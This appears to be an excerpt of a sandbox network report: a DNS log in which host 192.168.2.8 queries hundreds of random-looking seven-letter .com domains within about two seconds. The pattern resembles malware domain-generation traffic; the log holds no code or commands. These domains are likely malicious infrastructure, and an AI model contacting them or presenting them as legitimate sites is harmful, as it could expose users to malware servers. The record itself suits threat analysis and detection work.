                                                                                                                                                                                                          Nov 11, 2024 18:24:20.372622013 CET192.168.2.81.1.1.10xa3ffStandard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.373157978 CET192.168.2.81.1.1.10x1b8cStandard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.373949051 CET192.168.2.81.1.1.10xb362Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.377012014 CET192.168.2.81.1.1.10xe346Standard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.377702951 CET192.168.2.81.1.1.10x24b8Standard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.378170013 CET192.168.2.81.1.1.10xfb86Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.378581047 CET192.168.2.81.1.1.10x88dbStandard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.378602982 CET192.168.2.81.1.1.10xd2edStandard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.379522085 CET192.168.2.81.1.1.10x5df9Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.379535913 CET192.168.2.81.1.1.10x4d97Standard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.379750967 CET192.168.2.81.1.1.10x204eStandard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.380199909 CET192.168.2.81.1.1.10xbce4Standard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.380464077 CET192.168.2.81.1.1.10x443dStandard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.380717993 CET192.168.2.81.1.1.10x91b9Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381145954 CET192.168.2.81.1.1.10x5442Standard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381316900 CET192.168.2.81.1.1.10xd130Standard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381337881 CET192.168.2.81.1.1.10x387bStandard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381639004 CET192.168.2.81.1.1.10x4dc0Standard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.381700993 CET192.168.2.81.1.1.10x7db0Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.892559052 CET192.168.2.81.1.1.10xd7fdStandard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.897095919 CET192.168.2.81.1.1.10x4d38Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.897932053 CET192.168.2.81.1.1.10xa650Standard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.905782938 CET192.168.2.81.1.1.10x9fe3Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.911660910 CET192.168.2.81.1.1.10x2ca2Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.913932085 CET192.168.2.81.1.1.10xa25aStandard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.917422056 CET192.168.2.81.1.1.10xb19Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.919970989 CET192.168.2.81.1.1.10x25a7Standard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.920609951 CET192.168.2.81.1.1.10xe31aStandard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.921519041 CET192.168.2.81.1.1.10x18d8Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.922144890 CET192.168.2.81.1.1.10xa8e5Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.922810078 CET192.168.2.81.1.1.10xe2aeStandard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.923381090 CET192.168.2.81.1.1.10x8568Standard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.924300909 CET192.168.2.81.1.1.10x30dbStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.925564051 CET192.168.2.81.1.1.10x9091Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.926136017 CET192.168.2.81.1.1.10xce25Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.966851950 CET192.168.2.81.1.1.10x769bStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.967138052 CET192.168.2.81.1.1.10x25cfStandard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.967644930 CET192.168.2.81.1.1.10xef50Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.967921019 CET192.168.2.81.1.1.10xab3Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.981900930 CET192.168.2.81.1.1.10x9c2bStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.982528925 CET192.168.2.81.1.1.10x5a22Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.983805895 CET192.168.2.81.1.1.10x4c44Standard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.984396935 CET192.168.2.81.1.1.10xeaf8Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.984801054 CET192.168.2.81.1.1.10xedd9Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.997653961 CET192.168.2.81.1.1.10xe189Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.997965097 CET192.168.2.81.1.1.10x369Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:20.998189926 CET192.168.2.81.1.1.10x4ec1Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.002069950 CET192.168.2.81.1.1.10xbb27Standard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.002419949 CET192.168.2.81.1.1.10x23d7Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.002886057 CET192.168.2.81.1.1.10xd3c2Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.061799049 CET192.168.2.81.1.1.10x7074Standard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.068455935 CET192.168.2.81.1.1.10x69d2Standard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.069173098 CET192.168.2.81.1.1.10xc416Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.069973946 CET192.168.2.81.1.1.10xcba2Standard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.070483923 CET192.168.2.81.1.1.10x9d04Standard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.092813015 CET192.168.2.81.1.1.10x3ae9Standard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.095741034 CET192.168.2.81.1.1.10x9424Standard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.113070965 CET192.168.2.81.1.1.10xd20eStandard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.116246939 CET192.168.2.81.1.1.10xe773Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.117970943 CET192.168.2.81.1.1.10x4f08Standard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.122728109 CET192.168.2.81.1.1.10xb9faStandard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.123003006 CET192.168.2.81.1.1.10xe4a5Standard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.124754906 CET192.168.2.81.1.1.10xbfb1Standard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.124933004 CET192.168.2.81.1.1.10x4258Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.125039101 CET192.168.2.81.1.1.10x6da4Standard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.125117064 CET192.168.2.81.1.1.10x91f0Standard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.125449896 CET192.168.2.81.1.1.10xaa89Standard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.125505924 CET192.168.2.81.1.1.10xeaa5Standard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.125710011 CET192.168.2.81.1.1.10x71d9Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.125724077 CET192.168.2.81.1.1.10x76f9Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.125808954 CET192.168.2.81.1.1.10xf647Standard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.125957966 CET192.168.2.81.1.1.10x4402Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.126028061 CET192.168.2.81.1.1.10x4a11Standard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.126136065 CET192.168.2.81.1.1.10xeea3Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.126473904 CET192.168.2.81.1.1.10x77c1Standard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.126632929 CET192.168.2.81.1.1.10xdc0aStandard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.126914024 CET192.168.2.81.1.1.10xc3c2Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.127029896 CET192.168.2.81.1.1.10xf729Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.127352953 CET192.168.2.81.1.1.10x79edStandard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.131509066 CET192.168.2.81.1.1.10x3ef5Standard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.132148027 CET192.168.2.81.1.1.10x608fStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.195017099 CET192.168.2.81.1.1.10x4ce0Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.359075069 CET192.168.2.81.1.1.10x7ccdStandard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.678121090 CET192.168.2.81.1.1.10xf6b4Standard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.679323912 CET192.168.2.81.1.1.10x15Standard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.681106091 CET192.168.2.81.1.1.10x7c4eStandard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.682418108 CET192.168.2.81.1.1.10x7669Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.703434944 CET192.168.2.81.1.1.10x56d6Standard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.703649998 CET192.168.2.81.1.1.10x2a18Standard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.703891993 CET192.168.2.81.1.1.10x7b0eStandard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.710247993 CET192.168.2.81.1.1.10x8f80Standard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.719089985 CET192.168.2.81.1.1.10x8488Standard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.752144098 CET192.168.2.81.1.1.10xe1e9Standard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.757190943 CET192.168.2.81.1.1.10xa5cbStandard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.765980959 CET192.168.2.81.1.1.10x5241Standard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.770410061 CET192.168.2.81.1.1.10xe9afStandard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.788871050 CET192.168.2.81.1.1.10x7461Standard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.789479971 CET192.168.2.81.1.1.10xa9aeStandard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.790707111 CET192.168.2.81.1.1.10xc8d7Standard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.791251898 CET192.168.2.81.1.1.10xf028Standard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.792041063 CET192.168.2.81.1.1.10x339cStandard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.793951988 CET192.168.2.81.1.1.10x4cf7Standard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.794604063 CET192.168.2.81.1.1.10x576aStandard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.796654940 CET192.168.2.81.1.1.10x60b3Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.796747923 CET192.168.2.81.1.1.10xd912Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.797825098 CET192.168.2.81.1.1.10xbbd6Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.798604965 CET192.168.2.81.1.1.10xccdfStandard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.799335003 CET192.168.2.81.1.1.10x7cdStandard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.809922934 CET192.168.2.81.1.1.10x64ffStandard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.811127901 CET192.168.2.81.1.1.10x9779Standard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.811333895 CET192.168.2.81.1.1.10x902eStandard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.811490059 CET192.168.2.81.1.1.10x5b59Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.812021017 CET192.168.2.81.1.1.10xf357Standard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.812736034 CET192.168.2.81.1.1.10xa1f3Standard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.813002110 CET192.168.2.81.1.1.10x112eStandard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.813795090 CET192.168.2.81.1.1.10x592dStandard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.814321995 CET192.168.2.81.1.1.10x93bdStandard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.814462900 CET192.168.2.81.1.1.10x8f2bStandard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.814610958 CET192.168.2.81.1.1.10x4312Standard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.814791918 CET192.168.2.81.1.1.10x77e2Standard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.814806938 CET192.168.2.81.1.1.10xfe68Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.819025993 CET192.168.2.81.1.1.10xc2deStandard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.820125103 CET192.168.2.81.1.1.10x4945Standard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.822392941 CET192.168.2.81.1.1.10x55b9Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.831383944 CET192.168.2.81.1.1.10x6bf3Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.834184885 CET192.168.2.81.1.1.10xdf06Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.834784985 CET192.168.2.81.1.1.10x3578Standard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.857215881 CET192.168.2.81.1.1.10x8a78Standard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.857613087 CET192.168.2.81.1.1.10x7faeStandard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.860039949 CET192.168.2.81.1.1.10x8791Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.860387087 CET192.168.2.81.1.1.10x412cStandard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.860625982 CET192.168.2.81.1.1.10x8f81Standard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.860992908 CET192.168.2.81.1.1.10xc948Standard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.860992908 CET192.168.2.81.1.1.10xb4a9Standard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.878289938 CET192.168.2.81.1.1.10x3fe6Standard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.878495932 CET192.168.2.81.1.1.10x2da3Standard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.878719091 CET192.168.2.81.1.1.10x5b07Standard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.881380081 CET192.168.2.81.1.1.10x7ac2Standard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.881792068 CET192.168.2.81.1.1.10x76afStandard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.882083893 CET192.168.2.81.1.1.10x6e6bStandard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.920027971 CET192.168.2.81.1.1.10x250eStandard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.920442104 CET192.168.2.81.1.1.10x680Standard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.920639992 CET192.168.2.81.1.1.10x1e6cStandard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.920639992 CET192.168.2.81.1.1.10xb1dStandard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.928854942 CET192.168.2.81.1.1.10x8394Standard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.929172039 CET192.168.2.81.1.1.10x57e0Standard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:21.929419041 CET192.168.2.81.1.1.10xe9c7Standard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.660393953 CET192.168.2.81.1.1.10x4081Standard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.661618948 CET192.168.2.81.1.1.10xb945Standard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.663162947 CET192.168.2.81.1.1.10x63dbStandard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.665334940 CET192.168.2.81.1.1.10x67aaStandard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.671719074 CET192.168.2.81.1.1.10x47e3Standard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.676481009 CET192.168.2.81.1.1.10x10c5Standard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.690836906 CET192.168.2.81.1.1.10x75Standard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.702395916 CET192.168.2.81.1.1.10x6942Standard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.709676027 CET192.168.2.81.1.1.10x749aStandard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.718905926 CET192.168.2.81.1.1.10x77f5Standard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.720860958 CET192.168.2.81.1.1.10xf7efStandard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.723264933 CET192.168.2.81.1.1.10x66c8Standard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.723552942 CET192.168.2.81.1.1.10xcafaStandard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.723910093 CET192.168.2.81.1.1.10xae70Standard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.724248886 CET192.168.2.81.1.1.10x5fd8Standard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.724862099 CET192.168.2.81.1.1.10xcd42Standard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.725310087 CET192.168.2.81.1.1.10x8277Standard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.725822926 CET192.168.2.81.1.1.10xe54fStandard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.732502937 CET192.168.2.81.1.1.10x4cdcStandard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.732898951 CET192.168.2.81.1.1.10x6840Standard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.734149933 CET192.168.2.81.1.1.10xc806Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.734646082 CET192.168.2.81.1.1.10x8402Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.734860897 CET192.168.2.81.1.1.10xa30aStandard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.742301941 CET192.168.2.81.1.1.10x8c37Standard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.742377043 CET192.168.2.81.1.1.10x1042Standard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.742649078 CET192.168.2.81.1.1.10x7dc1Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.742726088 CET192.168.2.81.1.1.10x1848Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.742845058 CET192.168.2.81.1.1.10x5e60Standard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.743017912 CET192.168.2.81.1.1.10x6562Standard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.750065088 CET192.168.2.81.1.1.10xf064Standard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.750124931 CET192.168.2.81.1.1.10x86acStandard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.750339985 CET192.168.2.81.1.1.10x1189Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.760874033 CET192.168.2.81.1.1.10x7e48Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.761079073 CET192.168.2.81.1.1.10xb844Standard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.761400938 CET192.168.2.81.1.1.10xa610Standard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Nov 11, 2024 18:24:22.761584044 CET192.168.2.81.1.1.10x941cStandard query (0)gadyzib.comA (IP address)IN (0x0001)false
